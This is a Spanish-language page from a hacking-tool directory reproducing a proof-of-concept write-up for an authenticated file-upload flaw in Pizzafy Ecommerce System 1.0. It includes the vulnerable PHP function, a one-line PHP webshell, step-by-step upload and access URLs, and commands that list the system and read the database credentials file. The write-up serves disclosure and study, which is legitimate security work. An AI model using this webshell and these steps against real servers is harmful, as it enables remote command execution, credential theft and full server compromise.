Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Herramientas/GitHubGitHub/xmyronn/cve-2026-7393-rce
Generación de PayloadsAnálisis de VulnerabilidadesAnálisis de CódigoExplotaciónExplotación de Aplicaciones WebPruebas de Penetración
GitHubxmyronn/cve-2026-7393-rce

CVE-2026-7393-RCE

Ver Repositorio
hace 3 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Pizzafy Ecommerce System 1.0: la carga de archivos sin restricciones en save_menu() conduce a la ejecución remota de código

Detalles

CampoValor
ProveedorSourceCodester
URL del proveedorhttps://www.sourcecodester.com
ProductoPizzafy Ecommerce System usando PHP y MySQL
URL del productohttps://www.sourcecodester.com/php/18708/pizzafy-ecommerce-system.html
Versión1.0
VulnerabilidadCarga de archivos sin restricciones → Ejecución remota de código
CWECWE-434
Puntuación CVSSv37.8 (Alta)
Vector de ataqueRed
Autenticación requeridaSí (Administrador)
Interacción del usuarioNinguna
InvestigadorImad Alvi
Fecha2026-04-12

Componente afectado

Archivo: Pizzafy/admin/admin_class_novo.php → función save_menu()
Parámetro: img (FILE)
Ruta de carga: Pizzafy/assets/img/


Descripción

La función save_menu() de Pizzafy Ecommerce System 1.0 gestiona la carga de imágenes de los elementos del menú sin realizar ninguna validación del tipo de archivo. La aplicación obtiene la extensión del archivo mediante pathinfo(), pero nunca comprueba ni restringe los tipos de archivo permitidos antes de mover el archivo cargado al directorio assets/img/, accesible desde la web. Un administrador autenticado puede cargar un webshell PHP disfrazado de imagen de menú y, a continuación, acceder directamente a él a través del navegador para lograr la ejecución remota de código en el servidor.

Código vulnerable en admin_class_novo.php:

root@kitploit:~
function save_menu(){
    extract($_POST);
    // ...
    if($_FILES['img']['tmp_name'] != ''){
        $fname = strtotime(date('y-m-d H:i')).'_'.$_FILES['img']['name'];
        $move = move_uploaded_file($_FILES['img']['tmp_name'],'../assets/img/'. $fname);
        $data .= ", img_path = '$fname' ";
    }
    // No extension check, no MIME type check
}

Prueba de concepto

Paso 1: crear el webshell PHP

Cree un archivo llamado shell_web2.php con el siguiente contenido:

root@kitploit:~
<?php echo shell_exec($_GET['cmd']); ?>

Paso 2: cargar el webshell mediante la gestión del menú

Inicie sesión como administrador y navegue hasta:

root@kitploit:~
http://localhost/pizzafy/Pizzafy/admin/index.php?page=menu

Rellene el formulario de menú con valores válidos y seleccione shell_web2.php como archivo de imagen. Haga clic en Guardar.

Captura de pantalla 2026-04-12 171202

El shell ahora aparece como un elemento de menú en la página orientada al cliente.

Captura de pantalla 2026-04-12 171236

Paso 3: localizar el shell cargado

Navegue hasta el directorio assets: el listado de directorios está habilitado (CWE-548):

root@kitploit:~
http://192.168.0.9/pizzafy/Pizzafy/assets/img/

El shell PHP cargado es visible en el listado del directorio.

Captura de pantalla 2026-04-12 171300

Paso 4: ejecutar comandos remotos

Acceda directamente al shell cargado y pase comandos del sistema mediante el parámetro cmd:

root@kitploit:~
http://192.168.0.9/pizzafy/Pizzafy/assets/img/1775994120_shell_web2.php?cmd=whoami

Respuesta: comando del sistema operativo ejecutado en el servidor:

root@kitploit:~
desktop-g1i9np3\dell
Captura de pantalla 2026-04-12 171313

Comandos adicionales

root@kitploit:~
?cmd=whoami
?cmd=ipconfig
?cmd=dir C:\xampp\htdocs\pizzafy
?cmd=type C:\xampp\htdocs\pizzafy\Pizzafy\admin\db_connect.php

Impacto

Un administrador autenticado puede:

  • Cargar archivos PHP arbitrarios en el servidor web
  • Ejecutar cualquier comando a nivel de sistema operativo en el servidor
  • Leer archivos confidenciales, incluidas las credenciales de la base de datos
  • Establecer una reverse shell para obtener acceso persistente completo
  • Comprometer por completo el servidor subyacente

Nota sobre el listado de directorios (CWE-548)

El directorio assets/img/ tiene el listado de directorios habilitado, lo que permite a usuarios no autenticados explorar todos los archivos cargados, incluido el webshell. Esto agrava la severidad de la vulnerabilidad de carga de archivos.


Referencias

  • SourceCodester — Pizzafy Ecommerce System
  • CWE-434: Carga sin restricciones de archivos con tipo peligroso
  • CWE-548: Exposición de información a través del listado de directorios
Descargar herramienta